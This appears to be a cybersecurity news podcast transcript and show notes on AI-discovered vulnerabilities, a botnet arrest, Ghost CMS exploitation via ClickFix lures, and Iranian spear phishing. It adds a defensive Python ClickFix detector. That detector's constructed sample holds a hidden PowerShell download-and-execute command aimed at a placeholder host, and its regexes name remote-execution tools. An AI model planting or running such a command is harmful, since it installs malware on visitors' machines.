Early evidence of the software vulnerability apocalypse arrives. Alleged Kimwolf botmaster arrested in Ottawa, Canada. Ghost CMS flaw hits Harvard and Oxford. And Iran-linked hackers run surgical spear phishing. This is Cybersecurity Today and I'm your host, David Shipley, coming to you from Canada's capital. Let's get started.

The early evidence of the rising vulnpocalypse is in, and the numbers tell a few interesting stories. Anthropic published an update on Friday on Project Glasswing, the AI-assisted vulnerability discovery initiative that the company first publicly described in April. Since the program went live last month, Anthropic says Claude Mythos has uncovered more than 10,000 candidate vulnerabilities, and more than 6,000 of those are flagged as high or critical severity across more than 1,000 open source projects. That's the marketing angle, and it's the one getting all the headlines. According to The Hacker News, the program currently runs with about 50 partner organizations who get exclusive early access to a non-public model called Claude Mythos Preview. The model is being used to autonomously scan widely used software and surface flaws before attackers can exploit them.

But here's where things get more interesting. The raw discovery numbers come with critical context. Of the 6,202 high or critical severity findings, only 1,726 have been confirmed as valid true positives after subsequent analysis. That's a true positive rate of about 28%. And while that's impressive for a machine working autonomously at this scale, it's also a reminder that the headline 10,000 number includes a lot of false positives that human reviewers still need to triage. Of the true positives, 97 so far have been patched upstream and 88 security advisories have been issued. And it's worth noting we have no idea what the total cost was to generate the false positives as well as the true findings. We know from some researchers working with the tool that it may cost up to $500 a minute in tokens.

One of the confirmed findings is a critical flaw in wolfSSL, an open source cryptography library used in embedded systems and Internet of Things devices. The vulnerability, tracked as CVE-2026-5194 with a CVSS score of 9.1, could allow an attacker to forge digital certificates and masquerade as a legitimate service.

For listeners tracking AI in offensive and defensive security, it's been an interesting few months. First there was the original leak from Anthropic that Mythos was coming, and then the deluge of headlines in April proclaiming the end is near when it comes to software vulnerability discovery and the sheer volume this tool could potentially discover. On May 13, we covered Google Threat Intelligence Group's report on the first AI-developed zero day used in mass exploitation. The capability of this tool cuts both defensively and offensively. The same models that find bugs for defenders will find them for attackers. Anthropic is urging organizations to shorten patch cycles and deploy security fixes faster, because the volume of newly discovered vulnerabilities is rising and will continue to grow. Microsoft has already publicly said its monthly patch volume will continue trending larger. Oracle has recently shifted to a monthly patch cycle. It's unclear if the software makers' patch quality processes can scale effectively as the threat grows, and if receiving organizations can even keep up with all the patches. And that's where the real story on the vulnpocalypse will be.

Canadian and US law enforcement have arrested the alleged operator of one of the largest DDoS botnets ever measured, and he's a 23-year-old from Ottawa. According to Krebs on Security, Jacob Butler, who went by the alias Dort online, was arrested in Ottawa on Wednesday by the Ontario Provincial Police under a U.S. extradition warrant. He's been charged in both jurisdictions with operating Kimwolf, an Internet of Things botnet that enslaved millions of Internet-connected devices and used them to launch some of the largest distributed denial of service attacks on record so far.

The numbers are extraordinary. According to the US Department of Justice, Kimwolf was linked to DDoS attacks measuring nearly 30 terabits per second, which the Justice Department describes as a record. The botnet is alleged to have issued more than 25,000 attacks. Victim losses exceeded $1 million in some cases, and some targets included Internet address ranges belonging to the US Department of Defense, which is why the Pentagon's Defense Criminal Investigative Service, together with the FBI field office in Anchorage, ended up running point on the US side of the investigation in February of this year.

Krebs on Security publicly identified Butler by working through his email addresses, his registrations on cybercrime forums, and his posts to public Telegram and Discord servers. Investigators later confirmed those connections through IP records, transaction records and message logs obtained through legal process. The criminal complaint says Butler did very little to separate his real-life identity from his criminal online persona. After Butler was unmasked, he allegedly directed retaliatory attacks against the researchers who helped identify him, including swatting, the practice of placing fake emergency calls in an attempt to send armed police to a target's home. Two of the named swatting victims were the founder of Krebs on Security, Brian Krebs, and Ben Brundage, founder of the cybersecurity firm Synthient.

The arrest is also part of a broader international effort. On March 19, US and international law enforcement seized the technical infrastructure for Kimwolf and three other large DDoS botnets, Aisuru, Jakscid and Mossad, that were all competing for the same pool of vulnerable IoT devices. In April, the Justice Department also seized domain names tied to roughly four dozen DDoS-for-hire services in a coordinated takedown. Butler remains in Canadian custody. He's scheduled for a hearing tomorrow, May 26th. None of the charges against him have been proven in a court of law. If extradited to the United States, he faces one count of aiding and abetting computer intrusion, with a maximum sentence of 10 years.

A large-scale campaign is exploiting a critical SQL injection flaw in Ghost CMS to compromise hundreds of websites, including Harvard University, Oxford University, Auburn University and the privacy-focused search engine DuckDuckGo, according to Bleeping Computer. The campaign has been documented by threat intelligence researchers at XLab, the security research arm of Chinese cybersecurity firm QiAnXin. The researchers confirmed at least 700 affected domains. The victim list spans university portals, AI and SaaS companies, media outlets, fintech firms, security sites and personal blogs.

The vulnerability is tracked as CVE-2026-26980. It affects Ghost CMS versions 3.24.0 through 6.19.0. The vulnerability allows an unauthenticated attacker to read arbitrary data from the website's database, including the admin API keys that grant management access over users, articles and themes. Ghost released a patch in February in version 6.19.1. Many sites didn't install it. SentinelOne flagged active exploitation a week later. Three months on, the exploitation is still going strong.

Here's how the attack chain worked. The attackers exploit the SQL injection flaw to steal the site's admin keys. They then use those keys to inject malicious JavaScript into the site's articles. When a visitor lands on a compromised page, the JavaScript fingerprints the visitor and decides whether to serve them a payload. Visitors who qualify see what looks like a Cloudflare verification prompt, the kind of prove-you're-a-human page many people have become used to and have learned to click through without thinking too much about it. This is what's known as a ClickFix attack. ClickFix is a class of social engineering attack that's exploded over the last year, with Microsoft noting 47% of initial access breaches were tied to this kind of attack. The fake verification page instructs the visitor to copy a string of text and paste it into the Windows command prompt, supposedly to confirm they're not a bot. The pasted command actually downloads and runs malware. XLab and SentinelOne both observed at least two distinct threat actors operating in the same Ghost CMS victim pool, sometimes cleaning each other's malicious scripts off a compromised site in order to inject their own.

For Ghost CMS administrators, the action is straightforward. Update to version 6.19.1 or later, rotate all admin API keys, and assume you were exposed if you were running a vulnerable version.

Iran-linked government hackers are running a sophisticated spear phishing espionage campaign against aerospace, defense and telecommunications companies in the United States, Israel, the United Arab Emirates and at least two other Middle Eastern countries, according to Cybersecurity Dive. Researchers at Palo Alto Networks Unit 42 have identified six new remote access Trojans deployed by an Iran-linked group they're calling Screening Serpens. The same group is tracked by other researchers under names including UNC1549, Smoke Sandstorm and Nimbus Manticore. They've been operating since well before the war, but have been visibly stepping up their operations since the war began.

What stands out about this campaign is not the malware, it's the targeting. The hackers are running deeply personalized spear phishing: fake job postings impersonating real aerospace companies, spoofed Microsoft Teams meeting invitations and customized recruitment emails sent through what looks like a legitimate employment website. The goal of each lure is to get the victim to execute the first stage of an infection chain themselves. Tehran-linked groups have also continued to orchestrate what Palo Alto describes as sustained, adaptive global cyber campaigns. The researchers warn organizations to expect further attempts in the near term.

This story contrasts with last week's report on Iran-linked hackers compromising automatic tank gauge systems at U.S. gas stations. The gas station story was all about the opportunistic end of the spectrum: unprotected IoT systems with low-effort exploitation. This story shows the high end: months of patient reconnaissance, deep social engineering and surgical targeting of high-value users in high-value sectors. The same adversary is operating at two very different tiers simultaneously. Defenders in aerospace, defense and telecom should adjust their threat model accordingly.

That's Cybersecurity Today for Monday, May 25, 2026. We appreciate all of your feedback. Feel free to leave a comment under the YouTube video or drop by technewsday.com or .ca and send us a note.
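As an added example for the Ghost CMS story (not code from the podcast, Ghost, XLab or SentinelOne): a small Python heuristic that scores fetched page HTML for the ClickFix pattern described above, a fake human-verification lure plus injected script that fingerprints the visitor and writes a command to the clipboard for them to paste into a Run or command prompt. The indicator regexes, weights and threshold are my assumptions to be tuned per environment; the two HTML samples are constructed for the demo, and example.invalid is a placeholder host, not a real payload.

```python
"""Heuristic ClickFix page scorer.

Added example for this page; not code from Ghost, XLab or SentinelOne.
Scores page HTML for the pattern described in the Ghost CMS story: a fake
verification lure, a fingerprinting script, and a command copied to the
clipboard for the visitor to paste into a Run/command prompt. Indicator
regexes, weights and the threshold are assumptions to tune per environment.
"""
import re
from html.parser import HTMLParser


class _PageExtractor(HTMLParser):
    """Split a page into inline <script> bodies and visible text."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self.text = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        (self.scripts if self._in_script else self.text).append(data)


# (name, pattern, where to look, weight). "script" = inline JS only; "any" = JS plus visible text.
INDICATORS = [
    ("clipboard_write",
     re.compile(r"navigator\.clipboard\.writeText|execCommand\(\s*['\"]copy", re.I), "script", 3),
    ("run_dialog_instructions",
     re.compile(r"win(dows)?(\s*key)?\s*\+\s*r\b|ctrl\s*\+\s*v\b", re.I), "any", 2),
    ("human_check_lure",
     re.compile(r"verify (that )?you are human|i'?m not a robot|verification step|cloudflare", re.I), "any", 1),
    ("lolbin_command",
     re.compile(r"\b(powershell|pwsh|mshta|cmd(\.exe)?\s*/c|rundll32|certutil)\b", re.I), "script", 3),
    ("remote_fetch_exec",
     re.compile(r"\b(irm|iwr|iex|Invoke-WebRequest|Invoke-Expression)\b|curl\s+[^|\n]*\|\s*(sh|bash)\b", re.I), "script", 2),
    ("ua_fingerprint_gate",
     re.compile(r"navigator\.(userAgent|platform)|Windows NT", re.I), "script", 1),
]
SUSPICIOUS_THRESHOLD = 6  # assumption: roughly a lure plus a clipboard write plus a command


def score_page(html: str) -> dict:
    """Return matched indicator names, total weight and a verdict for one page."""
    extractor = _PageExtractor()
    extractor.feed(html)
    scripts = "\n".join(extractor.scripts)
    everything = scripts + "\n" + "\n".join(extractor.text)
    hits = []
    for name, pattern, where, weight in INDICATORS:
        if pattern.search(scripts if where == "script" else everything):
            hits.append((name, weight))
    total = sum(weight for _, weight in hits)
    return {"score": total, "hits": [n for n, _ in hits], "suspicious": total >= SUSPICIOUS_THRESHOLD}


# Constructed samples (not captured from any real site). example.invalid is a placeholder.
BENIGN_POST = """<html><body>
<h1>Welcome to the blog</h1>
<p>We host on Cloudflare and publish every Tuesday.</p>
<script>document.querySelectorAll('pre code').forEach(el => el.classList.add('hl'));</script>
</body></html>"""

CLICKFIX_POST = """<html><body>
<h1>Welcome to the blog</h1>
<div id="cf-check"><p>Verify you are human: press Windows key + R, then Ctrl + V, then Enter.</p></div>
<script>
if (navigator.userAgent.indexOf("Windows NT") !== -1) {
  navigator.clipboard.writeText('powershell -w hidden -c "iwr http://example.invalid/a | iex"');
}
</script>
</body></html>"""


if __name__ == "__main__":
    for label, page in (("benign", BENIGN_POST), ("clickfix", CLICKFIX_POST)):
        print(label, score_page(page))
```

Two caveats when running this against real sites. A legitimate page can mention Cloudflare or a verification step, which is why a single indicator scores low and the verdict needs the lure, the clipboard write and a command together. And because the injected script fingerprints the visitor before deciding whether to build the lure, a plain fetch may only see the gating code; fetch with a Windows browser user agent, or scan the post HTML and code-injection fields directly in the CMS, rather than trusting one crawl from a Linux scanner.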
Episode Title: AI Vulnerability Explosion, Kim Wolf Botnet Arrest, Ghost CMS Hack, Iran Cyber Espionage
Host: David Shipley
Date: May 25, 2026
In this episode, David Shipley delivers a fast-paced, incisive briefing on four major cybersecurity stories dominating headlines: the unprecedented rise in discovered software vulnerabilities powered by AI, the dramatic arrest of an alleged major DDoS botnet operator in Canada, mass exploitation of a critical Ghost CMS flaw affecting high-profile institutions, and a surgically targeted Iranian cyber-espionage operation against defense and telecom companies. The episode blends hard numbers, technical specifics, and actionable advice for defenders as the threat landscape intensifies.
[00:20–05:30]
$500/minute in tokens.
“The same models that find bugs for defenders will find them for attackers.” —David Shipley [03:55]
[05:30–12:10]
“The criminal complaint says Butler did very little to separate his real-life identity from his criminal online persona.” —David Shipley [08:19]
[12:10–17:30]
“Click fix is a class of social engineering attack that’s exploded over the last year, with Microsoft noting 47% of initial access breaches were tied to this kind of attack.” —David Shipley [15:35]
[17:30–22:00]
“The same adversary is operating at two very different tiers simultaneously.” —David Shipley [21:00]
David Shipley’s report draws a picture of a cybersecurity landscape transformed by automation, machine intelligence, and global adversaries operating at both massive and surgical scales. The episode emphasizes the growing importance—and challenge—of response times, threat modeling, and adapting to new forms of technical and social exploitation. Listeners are left with clear, actionable takeaways in a time of rising risk and complexity.